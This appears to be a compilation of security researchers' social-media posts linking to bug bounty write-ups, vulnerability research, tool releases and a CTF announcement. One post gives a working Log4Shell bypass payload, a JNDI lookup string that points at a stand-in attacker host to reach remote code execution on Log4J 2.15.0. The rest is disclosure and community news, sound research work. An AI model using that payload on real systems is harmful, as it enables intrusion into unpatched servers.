New campaign targeting security researchers "Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations." blog.google/threat-analysi…

We did some fun tricks with nginx on bug bounties a while back, and made a post about out the configurations being vulnerable labs.detectify.com/2021/02/18/mid…

I just released RadioSploit, an Android application allowing to sniff and inject Zigbee,Mosart and Enhanced ShockBurst packets from a Samsung Galaxy S20 smartphone without requiring any additional hardware:it diverts the Bluetooth controller to add new offensive capabilities.1/14

HTTP/2: The Sequel is Always Worse by James Kettle portswigger.net/research/http2

Alternate data streams sound like this 🤯 to you? Well, thankfully we have Fredrik N. Almroth jumping in to help, telling us how to leak source code or bypass authentication with that 🦀 #bugbountytips 👇

I found some permission issues when hacking Apple CloudKit. I wrote about three of them Detectify labs, one where I accidentally deleted all shared Apple Shortcuts. labs.detectify.com/2021/09/13/hac…

FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n

Damn. This is really cool. Achieving RCE via LFI using Nginx as a way to upload a temporary file, even when PHP is hardened so other techniques will fail - bierbaumer.net/security/php-l…

Just three days remaining to cast your vote for the top 10 hacking techniques of 2021! Massive thanks to everyone who has already taken part; more voters means higher quality results. portswigger.net/polls/top-10-w…

The Department of Defense 🇺🇸 VDP #ResearcheroftheMonth for January 2022 is Fredrik N. Almroth. They submitted a critical report on manipulating DNS that enabled them to add DNS records to a DoD server! #VDPHackersFTW #cybersecurity

Bypassing CDN WAF’s with Alternate Domain Routing blog.ryanjarv.sh/2022/03/16/byp…

Had a great conversation about Detectify ‘s crowdsource program with Fredrik N. Almroth today in the studio. Def a interesting way of creating a passive income flow, submit a finding, preferably unauth, get it verified and get paid every time it hits / fires on any of their customers!

I decided to make a homage-post to Egor Homakov and Nir Goldshlager about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunt for bugs ♥️ thank you. labs.detectify.com/2022/07/06/acc…

I was finally able to disclose one of the examples from my last blog post labs.detectify.com/2022/07/06/acc… Here's the PoC-movie from the report to Reddit:

Recording of “JavaScript Prototype Poisoning, an unexplored bug-class, and it’s everywhere“ by Christoffer Jerkeby & Anton Linné is up: youtube.com/watch?v=VSZCyT… youtube.com/watch?v=VSZCyT…

How to turn bugs into a "passive" income stream! ft Detectify’s Fredrik N. Almroth youtu.be/oHhofSj9lEM #cybersecurity #bugbounty

OpenSSL 3.0.7 is out. TL&DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl

🇸🇪Midnight Sun CTF is back for it's 6th straight year! Registration is open here: midnightsunctf.com 🏆Qualifiers will run from 08 April, 2023 11:00 UTC -- 09 April, 2023 11:00 UTC 🥇On-site finals are on 18 August. As always check ctftime.org for details